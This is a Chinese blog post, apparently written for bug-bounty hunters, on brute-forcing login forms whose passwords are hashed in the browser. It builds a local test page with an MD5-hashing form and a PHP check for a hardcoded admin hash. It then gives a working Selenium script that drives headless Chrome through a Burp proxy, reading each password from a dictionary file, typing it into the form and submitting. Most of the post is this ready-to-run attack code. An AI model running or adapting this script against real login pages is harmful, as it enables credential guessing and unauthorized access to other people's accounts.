python模拟浏览器登录,绕过加密进行爆破
2020-07-12 本文已影响0人
book4yi
前言
挖掘SRC的时候,爆破登录框时,发现密码字段被加密了,不知道加密算法,如果是通过前端JS进行加密的话,往往要通过寻找JS文件了解加密过程。找到加密函数以后又要想办法构造密码字典,我个人感觉有点费时费力。那么有没有一个万能的方法呢?
解决办法:使用python的selenium库来模拟浏览器自动化点击,绕过加密和时间戳
在这之前,我只知道通过python的selenium库模拟浏览器来获取标题。
前期准备:
既然要模拟,那就要先搭建环境:
参照网上的拼凑一下
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>加密测试页面</title>
<script src="md5.js"></script>
<script>
function md5passwd(){
passwd = document.getElementById("password").value;
document.getElementById("password").value = hex_md5(passwd);
return true;
}
</script>
</head>
<form action="login.php" method="post" onsubmit="return md5passwd()">
<table width="450" border="0" bgcolor="#000000" cellspacing="1" cellpadding="2"><!--cellspacing指相邻单元格之间的间距,cellpadding指控制单元格内部文字与边框的边距-->
<tbody>
<tr height="30">
<td colspan="2" align="center" bgcolor="#CCCCCC"><font size="5">用户登录</font></td>
</tr>
<tr height="30">
<td width="150" align="right" bgcolor="#E6E6E6">用户名</td>
<td width="300" bgcolor="#E6E6E6">
<input type="text" name="username" id="username" maxlength="20" size="15" /></td>
</tr>
<tr height="30">
<td align="right" bgcolor="#E6E6E6">密码</td>
<td bgcolor="#E6E6E6">
<input name="password" type="password" id="password" size="15" maxlength="20" value=""/></td>
</tr>
<tr height="30">
<td align="center" colspan="2" bgcolor="#CCCCCC">
<input type="submit" name="submit" id="submit" value="提交" />
</td>
</tr>
</form>
<?php
if( isset( $_POST[ 'username' ] ) ) {
$user = $_POST[ 'username' ];
$pass = $_POST[ 'password' ];
echo "username: ",$user;
echo "<br>";
echo "password: ",$pass;
echo "<br>";
if ($pass == "8a30ec6807f71bc69d096d8e4d501ade" and $user == "admin"){
echo "login successfully!";
}else{
echo "用户名或密码错误";
}
}
?>
当用户输入的账户密码为:
username:admin
password:admin666
输出:login successfully!
效果如下:
利用代码:
import time
from selenium import webdriver
chrome_driver = r'C:\Program Files (x86)\Google\Chrome\Application\chromedriver.exe'
chrome_options = webdriver.ChromeOptions()
chrome_options.add_argument('--headless')
chrome_options.add_argument('--disable-gpu')
chrome_options.add_argument('--ignore-certificate-errors')
chrome_options.add_argument('--proxy-server=http://127.0.0.1:8080')
def start_chrome():
driver = webdriver.Chrome(executable_path=chrome_driver, chrome_options=chrome_options)
driver.start_client()
return driver
def find_info(path):
elms = driver.find_element_by_xpath(path)
return elms
if __name__ == "__main__":
url = 'http://192.168.107.136/login.php'
driver = start_chrome()
driver.get(url)
user_path = '/html/body/form/table/tbody/tr[2]/td[2]/input'
pass_path = '/html/body/form/table/tbody/tr[3]/td[2]/input'
submit_path = '/html/body/form/table/tbody/tr[4]/td/input'
with open(r'C:\Users\sws123\Desktop\pass.txt', 'r') as f:
lines = [line.strip() for line in f.readlines()]
for line in lines:
user_xpath = find_info(user_path)
pass_xpath = find_info(pass_path)
submit_xpath = find_info(submit_path)
user_xpath.send_keys('admin')
time.sleep(1)
pass_xpath.send_keys(line)
time.sleep(1)
submit_xpath.click()
time.sleep(1)
driver.quit()
准备好密码字典
打开burp,运行以上代码,查看效果:
我觉得OK
因缺思厅!
